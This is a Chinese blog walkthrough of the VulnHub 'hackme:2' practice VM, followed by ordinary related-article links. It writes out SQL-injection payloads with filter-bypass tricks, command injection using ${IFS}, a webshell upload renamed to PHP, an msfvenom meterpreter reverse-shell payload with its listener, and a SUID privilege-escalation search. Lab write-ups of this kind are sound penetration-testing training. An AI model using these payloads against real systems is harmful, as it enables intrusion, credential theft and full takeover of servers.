hackme:2

最新推荐文章于 2023-12-18 17:46:11 发布
最新推荐文章于 2023-12-18 17:46:11 发布
阅读量141 收藏 1
点赞数
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_47078547/article/details/131172528
版权 
下载地址:
https://www.vulnhub.com/entry/hackme-2,330/

测试机系统:kali、win10

测试机IP:192.168.3.140

kali:192.168.3.136

一、信息收集

1.主机发现

arp-scan -l

发现靶机IP:192.168.3.140

2.端口扫描

masscan --rate=100000 -p 0-65535 192.168.3.140

3.详细扫描

nmap -T4 -sV -O -p 22,80 192.168.3.140

 

4. gobuster进行目录扫描

gobuster dir -e -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,txt,zip,html -u http://192.168.3。140 -t 30

5. 网站指纹识别

whatweb http://192.168.3.140

6.访问目录扫描出的网站

1. 进入主页发现是登录页面,没有用户名及密码,但是页面有注册链接,进行注册用户

admin : 111111

使用所注册的用户登陆成功

这里的搜索框可能存在sql注入漏洞, 尝试验证一下 : 输入 OSINT'

测试闭合方式 输入OSION'# 回显正常

使用order by 猜测字段 : OSINT’ order by 3#     这里没有正常回显

OSINT'order/**/by/**/1#               #使用/**/过滤空格
OSINT'union/**/select/**/1,2,3#       #使用union 联合查询查看回显
查询数据库名
OSINT'union/**/select/**/database(),2,group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database()#
查询表名
OSINT'union/**/select/**/database(),2,group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name='users'#


OSINT'union/**/select/**/user,pasword,3/**/from/**/users#

找到superadmin用户 将加密值解码 得到密码: Uncrackable

登录进去
发现一个文件上传点 制作图片马上传 ,上传成功,但并未给出文件目录

下边还有一个命令执行漏洞注入点

两个查询框 可以尝试命令执行或是跨站脚本

2+2 被执行成了 4,这里可能存在 命令执行,万能phpinfo 打一下 ,回显phpinfo 存在 命令执行漏洞

使用bp 抓包 ,

fname=12&lname=system("cat<welcomeadmin.php")&search=Search+User

空格被过滤了,尝试使用<绕过空格

${IFS}也可以

通过阅读源码找到 文件上传的 路径访问我们刚刚上传的图片

上传成功,但并未解析成php

利用命令执行漏洞将图片改成php后缀

fname=12&lname=system('mv${IFS}/var/www/html/uploads/year2020/hack.jpg${IFS}/var/www/html/uploads/year2020/hack.php')&search=Search+User

使用蚁剑连接

成功getshell

访问/root的时候提示path not found or no permission 没有权限

权限提升

使用msf生成php木马

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.10.143 -f raw >/root/test.php

使用蚁剑上传到目标主机

msf开启监听

msf6 > use exploit/multi/handler

msf6 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp

msf6 exploit(multi/handler) > set LHOST 192.168.10.143

msf6 exploit(multi/handler) > run

访问我们的test.php页面

成功获取meterpreter

查找suid 文件
find / -perm -4000 -type f 2>/dev/null

/home/legacy/touchmenot 这个文件可疑 执行文件 查看当前用户,已经是root

Romantic Never Die
关注
HACKME: 1实战演练
龙狼刺的博客
05-24 178
HACKME: 1
漏洞payload 靶机_hackme:2 靶机攻略
weixin_42354108的博客
01-16 1077
原标题:hackme:2 靶机攻略 0x01 背景:hackme:2是vulnhub上的一个medium难度的CTF靶机,难度适中、内容丰富,贴近实战。而且没有太多的脑洞,适合安全工作者们用来练习渗透测试,然而唯一的缺憾是目前没有公开的攻略,因此把个人的通关过程记录于此,作为攻略分享给大家!0x02 技术关键词:SQL注入、WAF Bypass、模糊测试、文件上传、suid提权0x03 靶机发现与...
VulnHub-hackme:2漏洞利用流程
2301_76786857的博客
06-14 159
地址靶机IP:192.168.245.131测试机系统:kali、win10测试机IP:192.168.245.129。
HACKME: 2实战演练
龙狼刺的博客
04-27 140
靶机网站:https://www.vulnhub.com/entry/hackme-2,618/
【靶机渗透】HACKME: 1
安全狐
07-19 975
【靶机渗透】HACKME: 1 本篇将分享一个来源于VulnHub社区,适合初学者的靶机HACKME: 1 0x01靶机介绍 1. 详情 链接 https://www.vulnhub.com/entry/hackme-1,330/ 发布日期 2019年7月18日 作者 x4bx54 难度 初学者,简单 2. 描述 'hackme' is a beginner difficulty level box. The goal is to gain limite
红队打靶练习:HACKME: 1
分享
12-18 447
红队打靶练习:HACKME: 1 , 犹如猛虎撕咬般的恐惧感.....
HACKME:1靶机
JKding123的博客
10-22 995
HACKME:1 靶机地址 https://www.vulnhub.com/entry/hackme-1,330/ 靶机IP:192.168.3.142 kaliIP:192.168.3.133 主机发现 root@kali:~# arp-scan -l 端口扫描 开放了80、22端口 目录扫描 root@kali:~/dirsearch# python3 dirsearch.py -u http://192.168.3.142/ -e * 依次访问试试 http://192.168.3.142/lo
vulnhub hackme: 1
箭雨镜屋
02-11 3074
nmap扫描----->dirb和nikto扫描----->利用SQL联合注入得到superadmin账号密码----->通过文件上传漏洞获得反弹shell----->通过奇怪目录下有suid权限的文件提权
VulnHub-hackme:1漏洞利用流程
2301_76786857的博客
06-13 275
靶机地址靶机IP:192.168.245.131测试机系统:kali、win10测试机IP:192.168.245.1291.下载并导入靶机打开vmware——文件—打开—hackme.ova—导入虚拟机2.查看网络适配器将靶机网络适配器改为NAT模式3.启动靶机点击 ▶靶机,开启成功。
BLE_HackMe:低功耗蓝牙低硬件HackMe
03-13
低功耗蓝牙低硬件HackMe 该项目旨在介绍BLE协议及其安全性基础。 具有蓝牙接口的标准Windows 10计算机将模拟各种BLE设备-在无线电层上的工作原理与真实设备完全相同。 在一系列复杂性越来越高的任务中,允许您熟悉...
Hackme:Hackme is a network security answer platform,Hackme网络安全答题平台
04-27
Hackme Hackme is a network security answer platform,Hackme网络安全答题平台 sec 为第一个版本,大家多多支持。 由于之前写的时候是用于网络安全知识普及性质的线下赛,所以有些内容不适合线上CTF,需要一些修改...
海浪模型的matlab代码-HackMe:HackMe项目的官方公共存储库
05-27
海浪模型的matlab代码HackMe项目的官方公共存储库。 想要贡献吗? 联系Harris Mohamed()或Amith Chivikula() HackIllinois 2019海洋资源软件(Particle提出),The Very Hungry Caterpillar(Caterpillar提出)...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8459
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
Pytorch文本分类(imdb数据集),包含DataLoader数据加载,最优模型保存
最新发布
09-15
Pytorch文本分类(imdb数据集),包含DataLoader数据加载,最优模型保存_Pytorch-imdb-classification
5001-微信小程序家庭记账本的设计与实现+ssm(源码+数据库+lun文).zip
09-15
本系统主要针对计算机相关专业的正在做毕业设计的学生和需要项目实战练习的学习者,可作为毕业设计、课程设计、期末大作业。本系统主要针对计算机相关专业的正在做毕业设计的学生和需要项目实战练习的学习者,可作为毕业设计、课程设计、期末大作业。本系统主要针对计算机相关专业的正在做毕业设计的学生和需要项目实战练习的学习者,可作为毕业设计、课程设计、期末大作业。本系统主要针对计算机相关专业的正在做毕业设计的学生和需要项目实战练习的学习者,可作为毕业设计、课程设计、期末大作业。
5334-微信小程序同城交易小程序(源码+数据库).zip
09-15
本系统主要针对计算机相关专业的正在做毕业设计的学生和需要项目实战练习的学习者,可作为毕业设计、课程设计、期末大作业。本系统主要针对计算机相关专业的正在做毕业设计的学生和需要项目实战练习的学习者,可作为毕业设计、课程设计、期末大作业。本系统主要针对计算机相关专业的正在做毕业设计的学生和需要项目实战练习的学习者,可作为毕业设计、课程设计、期末大作业。本系统主要针对计算机相关专业的正在做毕业设计的学生和需要项目实战练习的学习者,可作为毕业设计、课程设计、期末大作业。
iOS一行代码集成空白页面占位图(无数据、无网络占位图)_emptyView-empty_set_LYEmptyView.zip
09-15
iOS一行代码集成空白页面占位图(无数据、无网络占位图)_emptyView-empty_set_LYEmptyView
java-ssm+jsp热带水果商城网站实现源码(项目源码-说明文档)
09-15
登陆系统后,可以查看个人中心,用户管理,地区管理,商品分类管理,商品信息管理,留言板,系统管理,订单管理等功能 项目关键技术 开发工具:IDEA 、Eclipse 编程语言: Java 数据库: MySQL5.7+ 后端技术:ssm 前端技术:jsp 关键技术:jsp、spring、ssm、MYSQL、MAVEN 数据库工具:Navicat、SQLyog
AppUse:安卓渗透测试平台与定制ROM详解
AppUse还带有直观的dashboard界面,简化了测试流程,预装了‘hackme’应用和服务端,用于学习和实践渗透测试技术。该平台基于Ubuntu Linux,内置了常用的攻击工具和环境变量,如ADB,便于高效工作。" AppUse是...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值